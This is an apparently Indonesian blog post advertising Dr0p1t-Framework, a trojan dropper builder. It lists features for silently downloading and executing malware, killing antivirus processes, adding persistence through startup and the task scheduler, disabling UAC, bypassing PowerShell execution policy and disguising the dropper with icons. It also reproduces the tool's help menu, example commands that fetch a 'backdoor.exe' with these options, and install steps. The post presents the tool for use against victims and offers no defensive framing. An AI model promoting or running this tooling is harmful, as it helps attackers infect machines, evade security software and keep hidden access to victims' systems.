Dr0p1t-Framework 1.2 - A Framework

Dr0p1t-Framework 1.2 - A Framework

3:19 PM
Pernakah anda mendengar tentang Trojan Droppers ?

Dalam waktu yang  pendek jenis trojan ini akan mendownload malware lain dan Dr0p1t memberi Anda kesempatan untuk membuat sebuah pipet yang akan memotong sebagian AV dengan beberapa trik.

 Features 
  • Framework works with Windows and Linux
  • Download executable on target system and execute it silently..
  • The executable size small compared to other droppers generated the same way
  • Self destruct function so that the dropper will kill and delete itself after finishing it work
  • Adding executable after downloading it to startup
  • Adding executable after downloading it to task scheduler ( UAC not matters )
  • Finding and killing the antivirus before running the malware
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
  • The ability to disable UAC
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
  • Choose an icon for the dropper after creating it

Screenshots

On Windows




Help menu 
Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Contoh
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prasyarat 
  • Python 2 atau Python 3.
Versi yang dianjurkan untuk Python 2 adalah 2.7.x, versi direkomendasikan untuk Python 3 adalah 3.5.x dan tidak menggunakan 3,6 karena itu belum didukung oleh PyInstaller
  • Python perpustakaan persyaratan dalam requirements.txt

dependensi yang diperlukan untuk linux 
  • wine
  • Python 2,7 pada Wine Machine
Catatan: Anda harus memiliki akses root
Instalasi 
jika Anda berada menggunakan linux

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

Dan jika Anda menggunakan Windows download dan kemudian lakukan seperti dibawah ini 
cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Diuji pada: 
  • Kali Linux - SANA
  • Ubuntu LTS 14,04-16,04
  • Windows 10 / 8.1 / 8

Fatih

Share this

Related Posts

Next
« Prev Post
Previous
Next Post »

Subscribe to: Post Comments (Atom)